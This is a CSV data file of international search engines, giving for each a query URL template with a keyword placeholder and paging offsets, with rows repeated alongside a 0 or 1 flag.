"International","Rambler 4 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=46","0"
"International","Rambler 4 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=46","0"
"International","Rambler 4 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=46","0"
"International","Rambler 4 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=46","0"
"International","Rambler 4 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=46","0"
"International","Rambler 5 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=61","1"
"International","Rambler 5 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=61","0"
"International","Rambler 5 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=61","0"
"International","Rambler 5 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=61","0"
"International","Rambler 5 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=61","0"
"International","Rambler 5 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=61","0"
"International","Rolist","http://www.rolist.com/results.cfm?search={SEARCH_KEYWORD}","1"
"International","Rolist","http://www.rolist.com/results.cfm?search={SEARCH_KEYWORD}","0"
"International","Rolist","http://www.rolist.com/results.cfm?search={SEARCH_KEYWORD}","0"
"International","Rolist","http://www.rolist.com/results.cfm?search={SEARCH_KEYWORD}","0"
"International","Rolist","http://www.rolist.com/results.cfm?search={SEARCH_KEYWORD}","0"
"International","Rolist","http://www.rolist.com/results.cfm?search={SEARCH_KEYWORD}","0"
"International","ScrubTheWeb","http://www.scrubtheweb.com/cgi-bin/search.cgi?keyword={SEARCH_KEYWORD}","1"
"International","ScrubTheWeb","http://www.scrubtheweb.com/cgi-bin/search.cgi?keyword={SEARCH_KEYWORD}","0"
"International","ScrubTheWeb","http://www.scrubtheweb.com/cgi-bin/search.cgi?keyword={SEARCH_KEYWORD}","0"
"International","ScrubTheWeb","http://www.scrubtheweb.com/cgi-bin/search.cgi?keyword={SEARCH_KEYWORD}","0"
"International","ScrubTheWeb","http://www.scrubtheweb.com/cgi-bin/search.cgi?keyword={SEARCH_KEYWORD}","0"
"International","ScrubTheWeb","http://www.scrubtheweb.com/cgi-bin/search.cgi?keyword={SEARCH_KEYWORD}","0"
"International","ScrubTheWeb 2 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=1","1"
"International","ScrubTheWeb 2 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=1","0"
"International","ScrubTheWeb 2 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=1","0"
"International","ScrubTheWeb 2 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=1","0"
"International","ScrubTheWeb 2 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=1","0"
"International","ScrubTheWeb 2 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=1","0"
"International","ScrubTheWeb 3 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=2","1"
"International","ScrubTheWeb 3 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=2","0"
"International","ScrubTheWeb 3 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=2","0"
"International","ScrubTheWeb 3 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=2","0"
"International","ScrubTheWeb 3 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=2","0"
"International","ScrubTheWeb 3 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=2","0"
"International","ScrubTheWeb 4 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=3","1"
"International","ScrubTheWeb 4 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=3","0"
"International","ScrubTheWeb 4 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=3","0"
"International","ScrubTheWeb 4 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=3","0"
"International","ScrubTheWeb 4 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=3","0"
"International","ScrubTheWeb 4 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=3","0"
"International","ScrubTheWeb 5 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=4","1"
"International","ScrubTheWeb 5 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=4","0"
"International","ScrubTheWeb 5 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=4","0"
"International","ScrubTheWeb 5 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=4","0"
"International","ScrubTheWeb 5 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=4","0"
"International","ScrubTheWeb 5 (Next 15)","http://www.scrubtheweb.com/cgi-bin/search.cgi?q={SEARCH_KEYWORD}&page=4","0"
"International","Search","http://www.search.com/search?q={SEARCH_KEYWORD}","0"
"International","Search","http://www.search.com/search?q={SEARCH_KEYWORD}","0"
"International","Search","http://www.search.com/search?q={SEARCH_KEYWORD}","0"
"International","Search","http://www.search.com/search?q={SEARCH_KEYWORD}","0"
"International","Search","http://www.search.com/search?q={SEARCH_KEYWORD}","0"
"International","Search","http://www.search.com/search?q={SEARCH_KEYWORD}","0"
"International","Search CH","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch","1"
"International","Search CH","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch","0"
"International","Search CH","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch","0"
"International","Search CH","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch","0"
"International","Search CH","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch","0"
"International","Search CH","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch","0"
"International","Search CH 2 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=10","1"
"International","Search CH 2 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=10","0"
"International","Search CH 2 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=10","0"
"International","Search CH 2 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=10","0"
"International","Search CH 2 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=10","0"
"International","Search CH 2 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=10","0"
"International","Search CH 3 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=20","1"
"International","Search CH 3 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=20","0"
"International","Search CH 3 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=20","0"
"International","Search CH 3 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=20","0"
"International","Search CH 3 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=20","0"
"International","Search CH 3 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=20","0"
"International","Search CH 4 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=30","1"
"International","Search CH 4 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=30","0"
"International","Search CH 4 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=30","0"
"International","Search CH 4 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=30","0"
"International","Search CH 4 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=30","0"
"International","Search CH 4 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=30","0"
"International","Search CH 5 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=40","1"
"International","Search CH 5 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=40","0"
"International","Search CH 5 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=40","0"
"International","Search CH 5 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=40","0"
"International","Search CH 5 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=40","0"
"International","Search CH 5 (Next 10)","http://www.search.ch/search.html?q={SEARCH_KEYWORD}&loc=ch&rank=40","0"
"International","SearchGate","http://www.searchgate.co.uk/results.php?keyword={SEARCH_KEYWORD}","0"
"International","SearchGate","http://www.searchgate.co.uk/results.php?keyword={SEARCH_KEYWORD}","0"
"International","SearchGate","http://www.searchgate.co.uk/results.php?keyword={SEARCH_KEYWORD}","0"
"International","SearchHippo","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}","1"
"International","SearchHippo","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}","0"
"International","SearchHippo","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}","0"
"International","SearchHippo","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}","0"
"International","SearchHippo","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}","0"
"International","SearchHippo","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}","0"
"International","SearchHippo 2 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=20","1"
"International","SearchHippo 2 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=20","0"
"International","SearchHippo 2 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=20","0"
"International","SearchHippo 2 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=20","0"
"International","SearchHippo 2 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=20","0"
"International","SearchHippo 2 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=20","0"
"International","SearchHippo 3 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=40","1"
"International","SearchHippo 3 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=40","0"
"International","SearchHippo 3 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=40","0"
"International","SearchHippo 3 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=40","0"
"International","SearchHippo 3 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=40","0"
"International","SearchHippo 3 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=40","0"
"International","SearchHippo 4 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=60","1"
"International","SearchHippo 4 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=60","0"
"International","SearchHippo 4 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=60","0"
"International","SearchHippo 4 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=60","0"
"International","SearchHippo 4 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=60","0"
"International","SearchHippo 4 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=60","0"
"International","SearchHippo 5 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=80","1"
"International","SearchHippo 5 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=80","0"
"International","SearchHippo 5 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=80","0"
"International","SearchHippo 5 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=80","0"
"International","SearchHippo 5 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=80","0"
"International","SearchHippo 5 (Next 20)","http://www.searchhippo.com/q.php?q={SEARCH_KEYWORD}&c=20&i=80","0"
"International","SearchNZ","http://www.searchnz.co.nz/cgi-bin/search?search=&q={SEARCH_KEYWORD}","1"
"International","SearchNZ","http://www.searchnz.co.nz/cgi-bin/search?search=&q={SEARCH_KEYWORD}","0"
"International","SearchNZ","http://www.searchnz.co.nz/cgi-bin/search?search=&q={SEARCH_KEYWORD}","0"
"International","SearchNZ","http://www.searchnz.co.nz/cgi-bin/search?search=&q={SEARCH_KEYWORD}","0"
"International","SearchNZ","http://www.searchnz.co.nz/cgi-bin/search?search=&q={SEARCH_KEYWORD}","0"
"International","SearchNZ","http://www.searchnz.co.nz/cgi-bin/search?search=&q={SEARCH_KEYWORD}","0"
"International","SearchNZ 2 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=1","1"
"International","SearchNZ 2 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=1","0"
"International","SearchNZ 2 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=1","0"
"International","SearchNZ 2 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=1","0"
"International","SearchNZ 2 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=1","0"
"International","SearchNZ 2 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=1","0"
"International","SearchNZ 3 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=2","1"
"International","SearchNZ 3 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=2","0"
"International","SearchNZ 3 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=2","0"
"International","SearchNZ 3 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=2","0"
"International","SearchNZ 3 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=2","0"
"International","SearchNZ 3 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=2","0"
"International","SearchNZ 4 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=3","1"
"International","SearchNZ 4 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=3","0"
"International","SearchNZ 4 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=3","0"
"International","SearchNZ 4 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=3","0"
"International","SearchNZ 4 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=3","0"
"International","SearchNZ 4 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=3","0"
"International","SearchNZ 5 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=4","1"
"International","SearchNZ 5 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=4","0"
"International","SearchNZ 5 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=4","0"
"International","SearchNZ 5 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=4","0"
"International","SearchNZ 5 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=4","0"
"International","SearchNZ 5 (Next 10)","http://www.searchnz.co.nz/cgi-bin/search?q={SEARCH_KEYWORD}&ps=10&fm=off&np=4","0"
"International","SURFnet Search Engine","http://search.surfnet.nl/cgi-bin/query?mss=nl%2Fsimple&pg=q&filter=intranet&user=searchintranet&enc=iso88592&site=main&kl=&q={SEARCH_KEYWORD}","1"
"International","SURFnet Search Engine","http://search.surfnet.nl/cgi-bin/query?mss=nl%2Fsimple&pg=q&filter=intranet&user=searchintranet&enc=iso88592&site=main&kl=&q={SEARCH_KEYWORD}","0"
"International","SURFnet Search Engine","http://search.surfnet.nl/cgi-bin/query?mss=nl%2Fsimple&pg=q&filter=intranet&user=searchintranet&enc=iso88592&site=main&kl=&q={SEARCH_KEYWORD}","0"
"International","SURFnet Search Engine","http://search.surfnet.nl/cgi-bin/query?mss=nl%2Fsimple&pg=q&filter=intranet&user=searchintranet&enc=iso88592&site=main&kl=&q={SEARCH_KEYWORD}","0"
"International","SURFnet Search Engine","http://search.surfnet.nl/cgi-bin/query?mss=nl%2Fsimple&pg=q&filter=intranet&user=searchintranet&enc=iso88592&site=main&kl=&q={SEARCH_KEYWORD}","0"
"International","SURFnet Search Engine","http://search.surfnet.nl/cgi-bin/query?mss=nl%2Fsimple&pg=q&filter=intranet&user=searchintranet&enc=iso88592&site=main&kl=&q={SEARCH_KEYWORD}","0"
"International","SURFnet Search Engine 2 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=10","1"
"International","SURFnet Search Engine 2 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=10","0"
"International","SURFnet Search Engine 2 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=10","0"
"International","SURFnet Search Engine 2 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=10","0"
"International","SURFnet Search Engine 2 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=10","0"
"International","SURFnet Search Engine 2 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=10","0"
"International","SURFnet Search Engine 3 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=20","1"
"International","SURFnet Search Engine 3 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=20","0"
"International","SURFnet Search Engine 3 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=20","0"
"International","SURFnet Search Engine 3 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=20","0"
"International","SURFnet Search Engine 3 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=20","0"
"International","SURFnet Search Engine 3 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=20","0"
"International","SURFnet Search Engine 4 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=30","1"
"International","SURFnet Search Engine 4 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=30","0"
"International","SURFnet Search Engine 4 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=30","0"
"International","SURFnet Search Engine 4 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=30","0"
"International","SURFnet Search Engine 4 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=30","0"
"International","SURFnet Search Engine 4 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=30","0"
"International","SURFnet Search Engine 5 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=40","1"
"International","SURFnet Search Engine 5 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=40","0"
"International","SURFnet Search Engine 5 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=40","0"
"International","SURFnet Search Engine 5 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=40","0"
"International","SURFnet Search Engine 5 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=40","0"
"International","SURFnet Search Engine 5 (Next 10)","http://search.surfnet.nl/cgi-bin/query?mss=nl/simple&what=&pg=q&q={SEARCH_KEYWORD}&enc=iso88592&site=main&filter=intranet&stq=40","0"
"International","Teoma","http://s.teoma.com/search?q={SEARCH_KEYWORD}&u=200","0"
"International","Teoma","http://s.teoma.com/search?q={SEARCH_KEYWORD}&u=200","0"
"International","Teoma","http://s.teoma.com/search?q={SEARCH_KEYWORD}&u=200","0"
"International","Teoma","http://s.teoma.com/search?q={SEARCH_KEYWORD}&u=200","0"
"International","Teoma","http://s.teoma.com/search?q={SEARCH_KEYWORD}&u=200","0"
"International","Teoma","http://s.teoma.com/search?q={SEARCH_KEYWORD}&u=200","0"
"International","Terra ES","http://buscador.terra.es/default.asp?query={SEARCH_KEYWORD}&ca=s","1"
"International","Terra ES","http://buscador.terra.es/default.asp?query={SEARCH_KEYWORD}&ca=s","0"
"International","Terra ES","http://buscador.terra.es/default.asp?query={SEARCH_KEYWORD}&ca=s","0"
"International","Terra ES","http://buscador.terra.es/default.asp?query={SEARCH_KEYWORD}&ca=s","0"
"International","Terra ES","http://buscador.terra.es/default.asp?query={SEARCH_KEYWORD}&ca=s","0"
"International","Terra ES","http://buscador.terra.es/default.asp?query={SEARCH_KEYWORD}&ca=s","0"
"International","Terra ES 2 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=11&ca=s&","1"
"International","Terra ES 2 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=11&ca=s&","0"
"International","Terra ES 2 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=11&ca=s&","0"
"International","Terra ES 2 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=11&ca=s&","0"
"International","Terra ES 2 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=11&ca=s&","0"
"International","Terra ES 2 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=11&ca=s&","0"
"International","Terra ES 3 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=21&ca=s&","1"
"International","Terra ES 3 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=21&ca=s&","0"
"International","Terra ES 3 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=21&ca=s&","0"
"International","Terra ES 3 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=21&ca=s&","0"
"International","Terra ES 3 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=21&ca=s&","0"
"International","Terra ES 3 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=21&ca=s&","1"
"International","Terra ES 4 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=31&ca=s&","0"
"International","Terra ES 4 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=31&ca=s&","1"
"International","Terra ES 4 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=31&ca=s&","0"
"International","Terra ES 4 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=31&ca=s&","0"
"International","Terra ES 4 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=31&ca=s&","0"
"International","Terra ES 4 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=31&ca=s&","1"
"International","Terra ES 5 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=41&ca=s&","0"
"International","Terra ES 5 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=41&ca=s&","1"
"International","Terra ES 5 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=41&ca=s&","0"
"International","Terra ES 5 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=41&ca=s&","0"
"International","Terra ES 5 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=41&ca=s&","0"
"International","Terra ES 5 (Next 10)","http://buscador.terra.es/default.asp?rtm=continua&query={SEARCH_KEYWORD}&first=41&ca=s&","1"
"International","Terra MX","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&qta=&oq=&qm=0&nh=0&qp=web2&ud4=0","1"
"International","Terra MX","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&qta=&oq=&qm=0&nh=0&qp=web2&ud4=0","0"
"International","Terra MX","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&qta=&oq=&qm=0&nh=0&qp=web2&ud4=0","0"
"International","Terra MX","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&qta=&oq=&qm=0&nh=0&qp=web2&ud4=0","0"
"International","Terra MX","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&qta=&oq=&qm=0&nh=0&qp=web2&ud4=0","0"
"International","Terra MX","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&qta=&oq=&qm=0&nh=0&qp=web2&ud4=0","0"
"International","Terra MX 2 (Next 10)","http://buscador.terra.com.mx/mundial/mundial.asp?qt={SEARCH_KEYWORD}&oq=&nh=10&qp=mx&st=11&ud4=0&qm=0","1"
